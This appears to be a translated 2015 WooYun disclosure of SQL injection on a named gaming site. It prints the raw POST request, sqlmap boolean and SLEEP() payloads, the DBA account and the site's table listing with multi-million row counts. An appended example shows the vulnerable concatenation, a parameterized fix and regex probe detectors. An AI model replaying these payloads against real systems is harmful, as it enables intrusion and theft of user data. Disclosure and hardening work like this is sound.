
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0122280

Title: SQL injection on a 奇客星空 site, exposing over 4 million user records with DBA privileges

Vendor: 奇客星空

Author: 紫霞仙子

Submitted: 2015-06-23 14:32

Fixed: 2015-08-07 14:44

Published: 2015-08-07 14:44

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2015-06-23: Details sent to the vendor, awaiting vendor handling
2015-06-23: Vendor confirmed; details visible to the vendor only
2015-07-03: Details opened to core white hats and domain experts
2015-07-13: Details opened to regular white hats
2015-07-23: Details opened to intern white hats
2015-08-07: Details opened to the public

Summary:

233

Details:

POST /games/huodong/touch/20140516/userinfo.php HTTP/1.1
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://web.7k7k.com
Cookie:
Host: web.7k7k.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
act=ok&addr=3137%20Laguna%20Street&codeid=a&mailnum=sample%40email.tst&tel=555-666-0606&truename=wgbydocx&typeid=

Proof:

---
Parameter: codeid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: act=ok&addr=3137 Laguna Street&codeid=-3469 OR 9133=9133&mailnum=sample@email.tst&tel=555-666-0606&truename=wgbydocx&typeid=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=ok&addr=3137 Laguna Street&codeid=a AND (SELECT * FROM (SELECT(SLEEP(5)))KHbg)&mailnum=sample@email.tst&tel=555-666-0606&truename=wgbydocx&typeid=
---
web application technology: Apache, PHP 5.3.6
back-end DBMS: MySQL 5.0.12
current user: '7k7klianyun@192.168.11.19'
current user is DBA: True
available databases [2]:
[*] information_schema
[*] web7k
Database: web7k
[299 tables]
+--------------------------+
| admin_menu |
| admin_user |
| admin_user_role |
| baidu_keywordid |
| baidu_keywordid_days |
| baidu_sync_log |
| baidu_union |
| baidu_wm_days |
| gs_admin |
| gs_admin_group |
| gs_admin_menu |
| gs_charge |
| gs_charge_info |
| keyword |
| keywordid_week |
| kk_card_detail |
| kk_dealer |
| level_award |
| sogou_keywordid_days |
| sogou_sync_log |
| stat_adv_total |
| stat_money_log |
| stat_plan_category |
| testforid |
| uc_265g |
| uc_7k7kb |
| uc_7kblogs |
| uc_7kcharge |
| uc_addnum |
| uc_admin_logs |
| uc_adminlog |
| uc_adusers |
| uc_adv_category |
| uc_advert |
| uc_ahsgchoujiang |
| uc_ahsghd |
| uc_amtcount |
| uc_antecode |
| uc_antevote |
| uc_article |
| uc_asztchoujiang |
| uc_authogroup |
| uc_authority |
| uc_authormenu |
| uc_base |
| uc_binduser |
| uc_bulian |
| uc_buykk |
| uc_cardpay |
| uc_charge |
| uc_charge2011 |
| uc_charge_kkm |
| uc_chargeadduser |
| uc_chargefrom |
| uc_chargesale |
| uc_chengzi |
| uc_city |
| uc_class |
| uc_code |
| uc_codecate |
| uc_contactkf |
| uc_coop |
| uc_cps_account |
| uc_cps_confirm |
| uc_cps_rate |
| uc_cps_subuser |
| uc_cpskou |
| uc_cpslist |
| uc_cpssite |
| uc_cpsuser |
| uc_cqbyhd |
| uc_cqbynumber |
| uc_csbhchoujiang |
| uc_csbhhd |
| uc_csbhhdqd |
| uc_csbhma |
| uc_csbhrecord |
| uc_ddtchoujiang |
| uc_demouser |
| uc_dlqhd |
| uc_docochoujiang |
| uc_docohd |
| uc_downact |
| uc_downloads |
| uc_factions |
| uc_fcm |
| uc_fours |
| uc_fuchi |
| uc_gamecode |
| uc_gamecodeqxz |
| uc_gameindex |
| uc_games |
| uc_getaszt |
| uc_gethzw |
| uc_getuser |
| uc_gwactive |
| uc_hdlog |
| uc_hits |
| uc_hits_hours |
| uc_hzwchoujiang3 |
| uc_hzwhd01 |
| uc_hzwhd03 |
| uc_hzwquestion |
| uc_indexshow |
| uc_information |
| uc_integral_log |
| uc_jinjiang |
| uc_jjsgchoujiang |
| uc_jjsghd |
| uc_kanswer |
| uc_kdxyma |
| uc_kefu_question |
| uc_kefu_question_rookie |
| uc_kefu_rookie |
| uc_kefu_rookie_answer |
| uc_kefu_rookie_sh |
| uc_kefu_rookie_sh_answer |
| uc_kefu_vip |
| uc_kefu_vip_answer |
| uc_kkhuodong |
| uc_kkmao |
| uc_kquestion |
| uc_ktpd2choujiang |
| uc_ktpd2hd |
| uc_leftserverlist |
| uc_levelcharge |
| uc_levelset |
| uc_lhzschoujiang |
| uc_lhzschoujiang2 |
| uc_lhzshd |
| uc_lhzshd2 |
| uc_lhzsmtk |
| uc_loginlog |
| uc_makeReg |
| uc_makeWDReg |
| uc_mediabelong |
| uc_mediakeywords |
| uc_mediapic |
| uc_mgames |
| uc_mhit |
| uc_mthreads |
| uc_nc |
| uc_nslmchoujiang |
| uc_nslmhd |
| uc_other |
| uc_package |
| uc_package_code |
| uc_pageshow |
| uc_passlogs |
| uc_paypal |
| uc_paypalcharge |
| uc_pf |
| uc_pkddt |
| uc_pkddtuser |
| uc_pksupport |
| uc_playgame |
| uc_points |
| uc_points_record |
| uc_polling |
| uc_polls |
| uc_pwdappeal |
| uc_qq |
| uc_question |
| uc_qxzchoujiang |
| uc_qxzhd |
| uc_regFour |
| uc_sctxchoujiang |
| uc_sctxhd |
| uc_seoset |
| uc_servers |
| uc_settlement |
| uc_sign |
| uc_site |
| uc_sitepos |
| uc_sjsgchoujiang |
| uc_sjsghd |
| uc_smallpic |
| uc_sq_tuijiangame |
| uc_sqchoujiang |
| uc_sqhd |
| uc_sssghd |
| uc_subinfo |
| uc_sw |
| uc_swhours |
| uc_tg360 |
| uc_tgarticle |
| uc_tgbdnew |
| uc_tgcategory |
| uc_tgconfig |
| uc_tghao123 |
| uc_tghao123new |
| uc_tghao4 |
| uc_tghao5 |
| uc_tgmedia_image |
| uc_tgmedia_size |
| uc_tgmedia_type |
| uc_tgpage |
| uc_tgpage2 |
| uc_tgpage2345 |
| uc_tgpagehao123 |
| uc_tgpagehao123bak |
| uc_tgreg_page |
| uc_tgsgnew |
| uc_tgslides |
| uc_tgsynew |
| uc_tgxfnew |
| uc_threads |
| uc_tjaid |
| uc_tjaid2012 |
| uc_tjcount |
| uc_tjcpskou |
| uc_tjday |
| uc_tjdayold |
| uc_tjfrom |
| uc_tjgame |
| uc_tjhours |
| uc_tjmonthcount |
| uc_tjwdday |
| uc_tmpuser |
| uc_totalPay2011 |
| uc_totalPay2012 |
| uc_touchchoujiang |
| uc_touchfztp |
| uc_touchfztppl |
| uc_touchhd |
| uc_touchinfo |
| uc_touchpiao |
| uc_touchsign |
| uc_touchypcj |
| uc_touchypcj_tp |
| uc_union_day |
| uc_union_hours |
| uc_upload |
| uc_upload1 |
| uc_user0 |
| uc_user1 |
| uc_user10 |
| uc_user11 |
| uc_user12 |
| uc_user13 |
| uc_user14 |
| uc_user15 |
| uc_user16 |
| uc_user17 |
| uc_user18 |
| uc_user19 |
| uc_user2 |
| uc_user20 |
| uc_user21 |
| uc_user22 |
| uc_user23 |
| uc_user24 |
| uc_user25 |
| uc_user26 |
| uc_user27 |
| uc_user28 |
| uc_user29 |
| uc_user3 |
| uc_user30 |
| uc_user31 |
| uc_user32 |
| uc_user33 |
| uc_user34 |
| uc_user35 |
| uc_user36 |
| uc_user37 |
| uc_user38 |
| uc_user39 |
| uc_user4 |
| uc_user40 |
| uc_user41 |
| uc_user42 |
| uc_user43 |
| uc_user44 |
| uc_user45 |
| uc_user46 |
| uc_user47 |
| uc_user48 |
| uc_user49 |
| uc_user5 |
| uc_user6 |
| uc_user7 |
| uc_user8 |
| uc_user9 |
| uc_userlog |
| uc_vip |
| uc_vip_users |
| uc_vipuser |
| uc_wbcs |
| uc_webmaster |
| uc_wltemp |
| uc_wycqpwd |
| uc_xinshu |
| uc_xinshu_bzzr |
| uc_xinshu_cqby |
| uc_xinshu_login |
| uc_xinshu_mycs |
| uc_xinshu_rxtl |
| uc_zhixiao |
+--------------------------+
Database: web7k
+--------------+---------+
| Table | Entries |
+--------------+---------+
| uc_vip_users | 65420 |
+--------------+---------+
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user1 | 4279108 |
+----------+---------+
Database: web7k
+----------+---------+
| Table | Entries |
+----------+---------+
| uc_user7 | 4273494 |
+----------+---------+
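The sqlmap output above shows an unquoted numeric context on the codeid POST parameter: a tautology (`-3469 OR 9133=9133`) and a MySQL SLEEP() probe both reach the query. The following is an added example, not code from the original report or from the vendor; it uses an in-memory SQLite database as a stand-in for MySQL, constructed sample rows (the uc_user column names and values are made up here), and two heuristic detection patterns that are assumptions of this example. It shows the concatenation pattern that makes the report's payload return every row, the validated and parameterized form that does not, and a small check that flags request bodies carrying the two probe shapes from the sqlmap output.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample rows standing in for the report's uc_user tables.
# Column names and values are invented for this example.
SAMPLE_USERS = [
    (1, 1001, "alice", "alice@example.invalid"),
    (2, 1002, "bob", "bob@example.invalid"),
    (3, 1003, "carol", "carol@example.invalid"),
]

# Payload copied from the sqlmap output in the report (boolean-based blind, codeid parameter).
TAUTOLOGY_PAYLOAD = "-3469 OR 9133=9133"


def make_db():
    """In-memory SQLite database (MySQL stand-in) holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE uc_user (id INTEGER, codeid INTEGER, truename TEXT, mailnum TEXT)"
    )
    conn.executemany("INSERT INTO uc_user VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, codeid):
    """Unquoted string concatenation, matching the numeric context sqlmap found:
    the payload turns the WHERE clause into a tautology and every row comes back."""
    sql = "SELECT id, truename FROM uc_user WHERE codeid = " + codeid
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, codeid):
    """Type validation plus a bound parameter: the value never becomes SQL grammar."""
    try:
        codeid_int = int(codeid)
    except (TypeError, ValueError):
        return []  # reject non-integer input instead of interpolating it
    sql = "SELECT id, truename FROM uc_user WHERE codeid = ?"
    return conn.execute(sql, (codeid_int,)).fetchall()


# Detection side: heuristics (assumed here) for the two probe shapes in the sqlmap output.
PROBE_PATTERNS = [
    re.compile(r"\bOR\s+(\d+)\s*=\s*\1\b", re.IGNORECASE),  # tautology such as OR 9133=9133
    re.compile(r"\bSLEEP\s*\(", re.IGNORECASE),             # MySQL time-based probe
]


def flag_suspicious_params(body):
    """Return the names of POST parameters whose decoded values match a probe pattern."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if any(p.search(v) for v in values for p in PROBE_PATTERNS):
            hits.append(name)
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, TAUTOLOGY_PAYLOAD))  # all three rows
    print("hardened:  ", lookup_hardened(db, TAUTOLOGY_PAYLOAD))    # []
    print("hardened:  ", lookup_hardened(db, "1002"))               # [(2, 'bob')]
    print(flag_suspicious_params("act=ok&codeid=" + TAUTOLOGY_PAYLOAD + "&typeid="))
```

The hardened lookup rejects anything that is not an integer before the query is built, so the tautology and the SLEEP() probe are never interpolated; the detection patterns are a log-review aid for spotting the specific shapes sqlmap produced here, not a substitute for the parameterized query.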

Remediation:

~~~Requesting 20 Rank

Copyright notice: when reposting, please credit 紫霞仙子@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-06-23 14:43

Vendor reply:

Any creativity here? Could the title leave out the "4 million"? You say give 20 Rank and I'm just supposed to give 20?

Latest status:

None yet